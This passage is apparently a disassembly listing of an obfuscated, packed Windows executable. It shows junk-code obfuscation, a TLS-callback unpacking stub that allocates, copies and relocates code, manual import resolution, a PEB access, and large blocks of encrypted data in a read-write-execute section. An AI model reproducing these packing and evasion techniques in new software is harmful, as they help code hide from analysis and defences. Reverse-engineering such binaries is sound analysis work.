loc_48E796:				; CODE XREF: sub_48A195+F61j
		push	esi
		jmp	loc_48E4B4
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_548. PRESS KEYPAD	"+" TO EXPAND]
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C70A

loc_48E79F:				; CODE XREF: sub_48C70A+2Cj
		add	eax, 4AE75DB6h
		add	edi, eax
		pop	eax
		mov	edi, [edi]
		jmp	near ptr dword_48A230+2
; END OF FUNCTION CHUNK	FOR sub_48C70A
; ---------------------------------------------------------------------------

loc_48E7AF:				; CODE XREF: ss.cste0:0048DA82j
		xchg	edx, [esp]
		pop	edx
		push	0E83CBB66h
		pop	esi
		jmp	near ptr dword_48B574+2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E621

loc_48E7BE:				; CODE XREF: sub_48E621-BC8j
		and	edx, 0CF3B90B3h
		sub	edx, 679AAAE7h
		add	edx, 20D57B89h
		push	48A602h
		jmp	near ptr dword_48AB28+2
; END OF FUNCTION CHUNK	FOR sub_48E621
; ---------------------------------------------------------------------------
		dw 3487h
		dd 5EC68B24h, 18B7F081h, 0E2E9E0B4h, 0FFFFC3h
		db 0, 9Ch

; =============== S U B	R O U T	I N E =======================================



sub_48E7EE	proc near		; CODE XREF: ss.cste0:0048D736p
		xchg	edi, [esp+0]
		pop	edi
		push	ebx
		push	0F49A2D7h
		pop	ebx
		jmp	near ptr byte_48B881+2
sub_48E7EE	endp

; ---------------------------------------------------------------------------
		dw 0A7E8h
		dd 0FFFFE2h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E23D

loc_48E805:				; CODE XREF: sub_48E23D:loc_48D391j
		pop	ecx
		add	ecx, 0D35D82A6h
		sub	ecx, 796DFAB3h
		xor	ecx, 11B4876Ah
		rol	ecx, 11h
		add	ecx, 31A6B0B5h
		jmp	loc_48DF5C
; END OF FUNCTION CHUNK	FOR sub_48E23D
; ---------------------------------------------------------------------------
		align 4
		dd 489A8868h, 0B24EE900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E833:				; CODE XREF: sub_48A195+4EEj
		mov	ebx, offset byte_48B427
		jmp	loc_48C7AE
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48E83F:				; DATA XREF: sub_48A195+14F5o
		add	esp, 4
		push	1272F190h
		xchg	ebp, [esp]
		mov	eax, ebp
		pop	ebp
		or	eax, 3D2DBC11h
		call	sub_48C82C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_532. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E85B:				; CODE XREF: sub_48A195+291j
		push	offset sub_48BFD6
		jmp	nullsub_548
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_574. PRESS KEYPAD	"+" TO EXPAND]
		align 4
dword_48E86C	dd 0E77F689Dh, 0E1E90048h, 0FFFFFCh ; DATA XREF: sub_48A195+152Co
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E878:				; CODE XREF: sub_48A195+12F0j
		or	eax, ebx

loc_48E87A:				; CODE XREF: sub_48A195:loc_48B477j
		sub	edx, 814DC623h
		or	edx, 3A8EC054h
		add	edx, 8548BE4Ah
		popf
		call	loc_48BABB
		add	cl, ch

loc_48E894:				; CODE XREF: ss.cste0:0048D855j
		idiv	dword ptr [edi-16FF0001h]
		das
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0FEh
		dd 65E9FFFFh, 0FFFFEDh
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_567. PRESS KEYPAD	"+" TO EXPAND]
		align 4
dword_48E8A8	dd 17689C57h, 0E90048B6h, 0FFFFF2E0h, 2A900h, 840F0000h
					; DATA XREF: sub_48A195+DDCo
		dd 0FFFFC054h, 999D8168h, 0F0815869h, 0E0E84B87h, 8FF8E881h
		dd 0F081D33Bh, 0FD622CC3h, 0FFBF54E9h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

; =============== S U B	R O U T	I N E =======================================



sub_48E8DE	proc near		; CODE XREF: sub_48A195+1772j
					; sub_48A195+2DB0p

arg_0		= dword	ptr  4

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		push	offset dword_48B070
		jmp	locret_48B2CC
sub_48E8DE	endp

; ---------------------------------------------------------------------------
		align 10h
		dd 0E6815A00h, 0C680AFE0h, 0CE57EE81h, 0E6815E02h, 0DA453C93h
		dd 6805C6C1h, 48D3A7h, 0FFAFACE9h, 243C87FFh, 8B241487h
		dd 8B575AFAh, 243C87FAh, 48C8A968h, 0EA1AE900h,	0C100FFFFh
		dd 685014C3h, 0ECE6D652h, 0F2D6E958h, 1768FFFFh, 5850406Eh
		dd 830FC0D1h, 0FFFFCF23h
; ---------------------------------------------------------------------------

loc_48E948:				; CODE XREF: ss.cste0:0048D918j
		jmp	near ptr byte_489919+2
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48E94F	proc near		; CODE XREF: sub_48A195+FC2p
					; ss.cste0:0048D521j

; FUNCTION CHUNK AT 0048E1F1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048E4E0 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	ds:dword_45D0C0	; ExitProcess
		push	ecx
		push	0A00DEB43h
		pop	ecx
		rol	ecx, 0Ch
		or	ecx, 1828A0F7h
		jmp	loc_48E1F1
sub_48E94F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E973:				; CODE XREF: sub_48A195+E77j
		xchg	eax, [esp+4+var_4]
		pop	eax
		mov	eax, [eax]
		popf
		call	near ptr dword_48A32C+33h
		add	cl, ch
		add	dl, cl
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0FFh
		dd 688F0FFFh, 0E9FFFFCAh, 0FFFFC870h, 0EAE80000h, 0FFFFF1h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E998:				; CODE XREF: sub_48A195:loc_48AF9Ej
		add	esp, 4
		retn
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48E99D:				; CODE XREF: sub_48A195:loc_48D1E3j
		push	esi
		mov	esi, offset dword_489934
		jmp	near ptr dword_489928+1
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		pop	edi
		mov	eax, large fs:30h
		add	eax, 54h
		push	48A85Ch
		jmp	loc_48BC7A
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
; ---------------------------------------------------------------------------
		xchg	eax, ecx
		aad	0FFh
		inc	dword ptr [edi+1C87243Ch]
		and	al, 8Bh
		sti
		pop	ebx
		push	edi
		jmp	loc_48AA1D
; ---------------------------------------------------------------------------
		align 4
		dd 0C65FB850h, 0EAE90048h, 0F7FFFFCAh, 2D9105C7h, 0C6F4E920h
		dd 820FFFFFh, 0FFFFFC4Bh, 87240487h, 0C58B242Ch, 0FFF070E9h
		dd 820F00FFh, 0FFFFF096h, 6C9CFD81h, 0CCE9213Dh, 0FFFFAFh
		dd 48C07768h, 0E9D8E900h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

loc_48EA1F:				; CODE XREF: ss.cste0:0048C9D9j
		sbb	ebx, 0BB95737Ch
		mov	ecx, ebp
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48EA27:				; CODE XREF: sub_48A195+2D4Cj
		push	offset loc_48B683
		jmp	locret_48A6EF
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 81h,	0E2h, 0Eh
		dd 0E9EC4EFFh, 0FFFFB48Dh, 68098B00h, 48BBC5h, 0FFC6F2E9h
		dd 0E92A87FFh, 0FFFFC4DDh
		db 0
; ---------------------------------------------------------------------------

loc_48EA51:				; CODE XREF: ss.cste0:0048C30Aj
		xchg	ecx, [esp]
		pop	ecx
		add	eax, 0DCC9F600h
		mov	eax, [eax]
		mov	al, [eax]
		jmp	near ptr loc_48E252+1
; ---------------------------------------------------------------------------
		db 2 dup(0)
word_48EA66	dw 0C381h		; DATA XREF: sub_48A195+254Ao
		dd 0C75070B5h, 1C871B8Bh, 0C015FF24h, 0E90045D0h, 0FFFFBC2Dh
		db 0
byte_48EA7D	db 9Ch,	68h, 8Fh	; DATA XREF: sub_48A195+143o
		dd 687F8CA6h, 489C4Ah, 0FFCDADE9h, 850F00FFh, 0FFFFBA95h
		dd 0E3810000h, 0A8F650BEh, 7DE9CF85h, 87FFFFBAh, 0E95B241Ch
		dd 0FFFFD1A9h, 0C30000h

; =============== S U B	R O U T	I N E =======================================



sub_48EAB0	proc near		; CODE XREF: ss.cste0:0048D76Aj
		push	offset byte_48B4A7
		jmp	nullsub_585
sub_48EAB0	endp

; ---------------------------------------------------------------------------
		dw 68E9h
		dd 0FFFFDAh, 8B241459h,	0E9D68BCAh, 0FFFFD3DFh,	0D5F2E800h
		dd 0E900FFFFh, 0FFFFE5B9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48EAD9:				; CODE XREF: sub_48A195+15B9j
		jmp	loc_48B8C7
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48EADF:				; CODE XREF: ss.cste0:0048C394j
		xchg	ecx, [esp]
		pop	ecx
		call	sub_48C3A4
; ---------------------------------------------------------------------------
		dd 8EE90000h, 9CFFFFDBh, 0F3810A87h, 0E870CE8Ch, 0AF08CB81h
		dd 0C3C180ABh, 0A449681Eh, 0D3E90048h, 0FFFFECh, 0EEE8C300h
		dd 0FFFFDEh, 0FFEFD2E9h, 0E916E9FFh, 328BFFFFh,	0FFDBE5E9h
		dd 29E99CFFh, 0FFFFF6h
byte_48EB2C	db 8Bh,	0		; DATA XREF: sub_48A195+107Eo
word_48EB2E	dw 0E89Ch		; DATA XREF: ss.cste0:0048D157o
		dd 0FFFFFEC0h, 0FFAEE8E9h
		db 0FFh, 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_558. PRESS KEYPAD	"+" TO EXPAND]
dword_48EB3C	dd 2481F781h, 46680D12h, 0E90048B7h, 0FFFFD7DEh, 58B6400h
					; DATA XREF: sub_48DAFF:loc_48DA5Fo
		dd 30h,	87C28B50h, 0F4682404h, 5A7AB7CBh, 0D4B0C281h, 0EA81F2EAh
		dd 0D5649FACh, 0FFD6EAE9h, 0C8700FFh, 0D2095924h, 5840Fh
		dd 0B1E80000h, 68FFFCE5h, 48B5B8h, 0FFC1ACE9h, 0C20300FFh
		dd 8B243C87h, 4C5FD7h, 1A9h, 0C9840F00h, 0E9FFFFD4h, 0FFFFBB79h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BFD6

loc_48EBA9:				; CODE XREF: sub_48BFD6+1Ej
		call	sub_48D83C
; END OF FUNCTION CHUNK	FOR sub_48BFD6
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------
		jmp	locret_48D1E8
; ---------------------------------------------------------------------------
		jmp	locret_48BD9C
; ---------------------------------------------------------------------------
		align 4
		dd 592FF081h, 2CE87BFDh
		db 0AEh, 2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_573. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48EBCA:				; CODE XREF: sub_48A195+762j
		jmp	loc_48B142
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		dd 87F28B56h, 0BE562434h, 48B62Ah, 0FFFA65E9h, 60B850FFh
		dd 0E90048D9h, 0FFFFEEE5h, 48AEF768h, 0FFBAE900h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E4E6

loc_48EBF6:				; CODE XREF: sub_48E4E6:loc_48E4EEj
		mov	edx, eax
		push	edi
		push	6FD0F899h
		pop	edi
		sub	edi, 3DE4D8B3h
		push	eax
		mov	eax, edi
		xchg	eax, [esp+8+var_8]
		jmp	loc_48ABC7
; END OF FUNCTION CHUNK	FOR sub_48E4E6
; ---------------------------------------------------------------------------
		dd 68500000h, 4AE82EB3h, 0BEC88158h, 81EAA1A7h,	793CCCF0h
		dd 0E9D003AAh, 0FFFFF716h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48EC2E:				; DATA XREF: ss.cste0:0048DA10o
		push	ecx
		push	296BE8Eh
		pop	ecx
		push	edi
		mov	edi, offset byte_48E759
		jmp	loc_48E330
; ---------------------------------------------------------------------------
		dd 8D0FC300h, 0FFFFE2ECh, 77E9F90Bh, 0FFFFB0h
; ---------------------------------------------------------------------------

loc_48EC50:				; CODE XREF: ss.cste0:0048C118j
		mov	eax, edx
		pop	edx
		add	eax, 6C7769AAh
		and	eax, 942F721Ch
		call	sub_48D91D
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48EC65:				; CODE XREF: ss.cste0:00489A57j
		mov	edx, offset loc_48D7CD
		jmp	loc_48A771
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48EC70	proc near		; CODE XREF: sub_48A195:loc_48B5B1p
		xchg	ecx, [esp+0]
		pop	ecx
		push	ebp
		mov	ebp, ebx
		xchg	ebp, [esp+0]
		push	91569DC5h
		pop	ebx
		jmp	near ptr dword_489A68+2
sub_48EC70	endp

; ---------------------------------------------------------------------------

loc_48EC85:				; CODE XREF: ss.cste0:0048D08Cj
		jge	loc_48E454
; ---------------------------------------------------------------------------
		db 0
		dd 5D8B5D00h, 0F7B0E900h, 0FFFFh, 680000C3h, 48A64Ah, 0FFB499E9h
		db 0FFh, 2 dup(0)
byte_48ECA7	db 0E8h			; DATA XREF: sub_48A195+23CCo
		dd 0FFFFE75Eh
		db 0, 0C3h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48ECAE:				; CODE XREF: sub_48A195-1B6j
		jmp	nullsub_553
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFE9F1h
		db 0
byte_48ECB9	db 68h,	0D0h, 74h	; DATA XREF: sub_48CF06+1B2o
		dd 0E85FE737h, 0FFFFDE21h, 0C7D10000h, 4E55FF81h, 0D6E99612h
		dd 0FFFFB1h, 0D932FD81h, 17E99327h
		db 0DBh, 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_48ECDF:				; CODE XREF: ss.cste0:loc_48E418j
		and	eax, 25DA1A49h
		push	48A638h
		jmp	near ptr word_48AEAA+1
; ---------------------------------------------------------------------------
		align 10h
		dd 9DC58100h, 0E910696Dh, 0FFFFE765h, 46840F00h, 0E9FFFFACh
		dd 0FFFFF7FFh, 0E48FE900h, 0FFFFh, 8C800F5Ah, 0E9FFFFF6h
		dd 0FFFFAC2Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48ED1E:				; CODE XREF: ss.cste0:0048DADAj
		and	ebp, 790B9EE4h
		shl	eax, 11h
		test	esi, 0EE1394h
		jmp	near ptr dword_489D78+1Eh
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48ED33:				; CODE XREF: ss.cste0:0048CDD1j
		push	41B82D3h
		pop	edi
		rol	edi, 17h
		cmp	edi, 5F03D716h
		jmp	loc_48E65C
; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48ED48	proc near		; CODE XREF: sub_48A195+17B3p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0048EE9B SIZE 0000000B BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		push	esi
		push	edi
		push	ebx
		mov	esi, offset dword_43A000
		mov	eax, 400000h
		mov	[ebp+var_4], eax
		mov	edx, eax

loc_48ED60:				; CODE XREF: sub_48ED48+159j
		mov	eax, [esi+0Ch]
		or	eax, eax

loc_48ED65:				; CODE XREF: sub_48A195+2296j
		jz	loc_48EDF7
		add	eax, edx
		mov	ebx, eax
		push	eax
		call	ds:dword_45D0B4	; GetModuleHandleA
		or	eax, eax
		jnz	loc_48ED8D
		push	ebx
		call	ds:dword_45D0B8	; LoadLibraryA
		or	eax, eax
		jz	loc_48EDEF

loc_48ED8D:				; CODE XREF: sub_48ED48+30j
		mov	[ebp+var_8], eax
		push	0
		pop	[ebp+var_C]

loc_48ED95:				; CODE XREF: sub_48ED48+A2j
		mov	eax, [esi]
		or	eax, eax
		mov	edx, [ebp+var_4]
		jnz	loc_48EDA5
		mov	eax, [esi+10h]

loc_48EDA5:				; CODE XREF: sub_48ED48+54j
		add	eax, edx
		add	eax, [ebp+var_C]
		mov	ebx, [eax]
		mov	edi, [esi+10h]
		add	edi, edx
		add	edi, [ebp+var_C]
		or	ebx, ebx
		jz	loc_48EE9B
		test	ebx, 80000000h
		jnz	loc_48EDCC
		lea	ebx, [ebx+edx+2]

loc_48EDCC:				; CODE XREF: sub_48ED48+7Aj
		and	ebx, 7FFFFFFFh
		push	ebx
		push	[ebp+var_8]
		call	ds:dword_45D0BC	; GetProcAddress
		or	eax, eax
		jz	loc_48EDEF
		mov	[edi], eax
		add	[ebp+var_C], 4
		jmp	loc_48ED95
; ---------------------------------------------------------------------------

loc_48EDEF:				; CODE XREF: sub_48ED48+3Fj
					; sub_48ED48+96j
		push	ebx
		mov	eax, ebx
		call	sub_48EDFE

loc_48EDF7:				; CODE XREF: sub_48ED48:loc_48ED65j
		pop	ebx
		pop	edi
		pop	esi
		mov	esp, ebp
		pop	ebp
		retn
sub_48ED48	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_48EDFE	proc near		; CODE XREF: sub_48ED48+AAp

var_108		= dword	ptr -108h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_FC		= dword	ptr -0FCh
var_F8		= dword	ptr -0F8h

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		mov	[ebp+var_104], eax
		mov	[ebp+var_100], 276E6143h
		mov	[ebp+var_FC], 6F6C2074h
		mov	[ebp+var_F8], 206461h
		mov	[ebp+var_108], 0Bh

loc_48EE35:				; CODE XREF: sub_48EDFE+97j
		mov	eax, [ebp+var_104]
		cmp	byte ptr [eax],	0
		jnz	loc_48EE74
		mov	eax, [ebp+var_108]
		mov	byte ptr [ebp+eax+var_100], 0
		push	2010h
		push	0
		lea	eax, [ebp+var_100]
		push	eax
		push	0
		call	ds:dword_45D104	; MessageBoxA
		push	0FFFFFFFFh
		call	ds:dword_45D0C0	; ExitProcess
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_48EE74:				; CODE XREF: sub_48EDFE+40j
		mov	eax, [ebp+var_108]
		mov	edx, [ebp+var_104]
		mov	dl, [edx]
		mov	byte ptr [ebp+eax+var_100], dl
		inc	[ebp+var_108]
		inc	[ebp+var_104]
		jmp	loc_48EE35
sub_48EDFE	endp

; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ED48

loc_48EE9B:				; CODE XREF: sub_48ED48+6Ej
		add	esi, 14h
		mov	edx, [ebp+var_4]
		jmp	loc_48ED60
; END OF FUNCTION CHUNK	FOR sub_48ED48
; ---------------------------------------------------------------------------
		dw 0C300h
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48EEAA	proc near		; CODE XREF: TlsCallback_0p
		mov	eax, offset loc_48976A

locret_48EEAF:				; DATA XREF: sub_48EEB0+8o
		retn
sub_48EEAA	endp


; =============== S U B	R O U T	I N E =======================================



sub_48EEB0	proc near		; DATA XREF: ss.cste0:0048A008o

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h

		push	esi
		push	edi
		push	ecx
		push	ebx
		push	eax
		mov	ebx, [esp+14h+var_14]
		sub	ebx, offset locret_48EEAF
		mov	eax, 4462h
		push	eax
		push	4
		push	1000h
		push	eax
		push	0
		mov	eax, offset dword_45D0C4
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		mov	edx, offset loc_48976A
		add	edx, ebx
		push	edx
		push	ebx
		push	eax
		mov	edi, eax
		mov	esi, edx
		cld
		rep movsb
		mov	ecx, offset sub_4895E6
		add	ecx, ebx
		call	ecx
		pop	eax
		mov	ebx, [esp+10h+var_10]
		push	8000h
		push	0
		push	eax
		mov	eax, 45D0C8h
		mov	eax, [eax+ebx]
		call	eax
		pop	ecx
		pop	eax
		pop	ebx
		sub	ebx, 5
		mov	byte ptr [ebx],	0B8h
		inc	ebx
		mov	[ebx], eax
		add	ebx, 4
		mov	byte ptr [ebx],	0C3h
		or	ecx, ecx
		jz	short loc_48EF65
		mov	ebx, eax
		call	loc_48EFC6
		cld
		lodsd
		cmp	eax, 0FFFFFFFFh
		jz	short loc_48EF65
		push	ebx
		mov	ebx, ecx

loc_48EF30:				; CODE XREF: sub_48EEB0+91j
					; sub_48EEB0+A4j ...
		add	ebx, eax
		add	[ebx], ecx
		add	ebx, 4
		lodsb
		cmp	al, 0FEh
		jnb	short loc_48EF43
		and	eax, 0FFh
		jmp	short loc_48EF30
; ---------------------------------------------------------------------------

loc_48EF43:				; CODE XREF: sub_48EEB0+8Aj
		add	ebx, 0FEh
		or	eax, eax
		jp	short loc_48EF56
		lodsw
		and	eax, 0FFFFh
		jmp	short loc_48EF30
; ---------------------------------------------------------------------------

loc_48EF56:				; CODE XREF: sub_48EEB0+9Bj
		lodsd
		dec	esi
		and	eax, 0FFFFFFh
		cmp	eax, 0FFFFFFh
		jnz	short loc_48EF30
		pop	eax

loc_48EF65:				; CODE XREF: sub_48EEB0+6Dj
					; sub_48EEB0+7Bj
		pop	ebx
		pop	ecx
		pop	edi
		pop	esi
		retn
sub_48EEB0	endp

; ---------------------------------------------------------------------------
		dw 0DEFBh
		dd 2480F028h, 9832D352h, 90C6BB81h, 0DCFA88CEh,	5C98F4E8h
		dd 23D9C69Bh, 0D6740BF6h, 0D1C7BBE9h, 0E1C1A64Dh, 37B3C382h
		dd 444F0E27h, 0ECE15D88h, 0FDCEA89Eh, 14E0830Ch, 8881C8CAh
		dd 0BA7C6153h, 0F7E869F0h, 5FFFFFEh, 0B8Bh
; ---------------------------------------------------------------------------
		jmp	eax

; =============== S U B	R O U T	I N E =======================================


		public TlsCallback_0

TlsCallback_0	proc near		; DATA XREF: ss.cste0:TlsCallbackso
		call	sub_48EEAA
		add	eax, 4BE0h
		jmp	eax
TlsCallback_0	endp

; ---------------------------------------------------------------------------

loc_48EFC6:				; CODE XREF: sub_48EEB0+71p
		call	sub_48EFCF
; ---------------------------------------------------------------------------
		db 0FFh
		db 3 dup(0FFh)

; =============== S U B	R O U T	I N E =======================================



sub_48EFCF	proc near		; CODE XREF: ss.cste0:loc_48EFC6p
		pop	esi
		retn
sub_48EFCF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		or	edi, eax
		xor	ah, ch
		std
		setalc
		movsd
		mov	ebx, 3E93AFEh
		adc	al, 79h
		pop	ebx
		retn
; ---------------------------------------------------------------------------
		dw 0B0FFh
		dd 7966F59h, 0CB185DE6h, 4CE3006Bh, 8EEE03E8h, 876F16B1h
		dd 0E89ADFBCh, 14A3FF3Eh
ss_cste0	ends

; Section 8. (virtual address 0008F000)
; Virtual size			: 00007000 (  28672.)
; Section size in file		: 00007000 (  28672.)
; Offset to raw	data for section: 0008F000
; Flags	E00000E0: Text Data Bss	Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
p9xindpz	segment	para public 'CODE' use32
		assume cs:p9xindpz
		;org 48F000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		dd 2CC13038h, 0A974C728h, 0BF29EC7Ah, 1E70BB54h, 0C9CBFD9Ah
		dd 9F25726Fh, 809A582h,	66105EACh, 68D09840h, 54A87CF9h
		dd 7B33F181h, 7D88AAC1h, 705650F8h, 4858D4A4h, 2C1AB0DCh
		dd 0B38C953Eh, 9EAB3D3Bh, 0AF93C92Fh, 387EA9BAh, 0B79F31Ah
		dd 64095183h, 0D2E7AC39h, 0D5B98ECh, 8123ACD2h,	0D6BB04F7h
		dd 0DF7CACA7h, 0A82BC558h, 0D130B23Ah, 97D596h,	11643CA1h
		dd 6C137C1Fh, 9E2DCF4Ch, 5DBF7692h, 0E44998F6h,	7EA3DACEh
		dd 0A82BD18Ch, 54772A83h, 7454291Ch, 2271A048h,	2E6EF87Dh
		dd 0BA35B015h, 0A1C5F8BCh, 4E45413Bh, 2D882F36h, 0C8902A4Ah
		dd 0C7597F7Ah, 56BDC4AEh, 0BF75BB97h, 8C455C11h, 482E09CBh
		dd 0D64D44F4h, 0B4FAEE95h, 96901FC9h, 0D35AAF3Fh, 0CDE42946h
		dd 0C39CEBBAh, 971293A3h, 0DE6A6305h, 5196DBFCh, 648C6312h
		dd 0DA6597C7h, 7B4AA5A7h, 51DD7A24h, 0BADD89C1h, 4AF5D9CEh
		dd 0C69ADB1Ch, 0D4F3CC14h, 4D6C82CDh, 27DFAE7Fh, 0EFEF6879h
		dd 53464D75h, 50CB8D9h,	0F48A6119h, 0B2901190h,	0B9BCBBD4h
		dd 98599BD5h, 4BFFD9E1h, 893B25DEh, 375FA420h, 0EFAB2BFFh
		dd 0FCD13F5Eh, 0BF81F99Bh, 0A9B02179h, 0A99C35FEh, 0BF1E4836h
		dd 3BBF4988h, 2444C036h, 1AC1B71h, 0BACB0814h, 1E0DC7F9h
		dd 0FB6FA1E4h, 0A0F08BAFh, 86B34E66h, 0A5552EEEh, 4FA6E269h
		dd 82D7D71Ah, 8AF0B6ABh, 0C04A1C1Bh, 0A5858AEDh, 0A46DDD38h
		dd 7F58A6DAh, 64D691B0h, 2F49E5A0h, 46757FBAh, 6F822859h
		dd 33E632BEh, 0FD306EBAh, 0EF00BE7h, 0DC99E630h, 0D91D5985h
		dd 0C251F78Eh, 60D21C18h, 0A6BD0C95h, 5F488EA4h, 0FACA2C6Ch
		dd 0BF123ED1h, 607066A0h, 9F929CE0h, 9216B3D7h,	3202F089h
		dd 50F2A034h, 1A8A1C9Eh, 8B1BF9C7h, 0D5E383DAh,	21DB1EB2h
		dd 0D21D53A0h, 45F7E0F8h, 0CBC7B45Bh, 71741254h, 4727C6DEh
		dd 3A7A77F1h, 686E840Ch, 15ABF87h, 3CE7AA1Eh, 1E73F971h
		dd 614D76A8h, 0C61B102Ah, 0A9DCBA3Fh, 2D363F88h, 54FDD459h
		dd 0BBE3FFBAh, 147E7610h, 1FDD079Bh, 35C1BF9Bh,	2EE60BB6h
		dd 16D6AD34h, 29B736Ah,	293398C4h, 9E40C393h, 0C9C3822Bh
		dd 82A211B3h, 0B668A4F1h, 1B7FCBE1h, 32109491h,	0B424E097h
		dd 4D436370h, 5E6AC40Ah, 909BD67Ch, 852551DBh, 832F95AEh
		dd 0C2075306h, 0A3D300D9h, 0A4FE6C8Bh, 0A9822B2Bh, 0A31E8A4Eh
		dd 357EA8C1h, 42030DBEh, 0C004038Bh, 0AB3BA081h, 0A63EE118h
		dd 0FE89733Fh, 1164D2C1h, 0DE99C5D3h, 888FE321h, 0FD14079Ch
		dd 95838F8Ch, 0CF7AC046h, 86B9EBE9h, 4E61786Ch,	76A73101h
		dd 39E8FF8h, 4F217942h,	0BC1BDBF4h, 9FB31F9Dh, 3C82C3E4h
		dd 0FB0FB8B8h, 199E6D04h, 2EE72C53h, 0B9EA7AE3h, 2C775DE0h
		dd 611C901Ah, 6ED7168h,	4119CE2Eh, 66F1AD99h, 4559943Ah
		dd 849DD452h, 4823D30Ch, 7680FCB9h, 3F551449h, 0BB0D7BE0h
		dd 0D0073322h, 0EF80D291h, 0C5FEE925h, 9FD643D1h, 0ECB375DBh
		dd 0B56FED8Bh, 84F729AAh, 755BAA80h, 871E2A84h,	40BA8984h
		dd 522CBBCh, 463C998h, 10516564h, 0E8179588h, 711BF000h
		dd 0C40E7132h, 0D871F26Ah, 0C4BE6E83h, 0EBC7E4CAh, 22B513ECh
		dd 0B41AC2ECh, 77A8F43h, 3CE00449h, 34852639h, 0BBB49E8Ch
		dd 94DDB60h, 9F41DCD2h,	0BC76F329h, 1040FE2Ah, 45B25FAEh
		dd 0B86D03Ah, 0F64846B4h, 0C7031B94h, 0FEFCB65h, 0F9327B71h
		dd 2484BFD1h, 16BD6938h, 0C8D6F671h, 0A7630671h, 4B2FBEEh
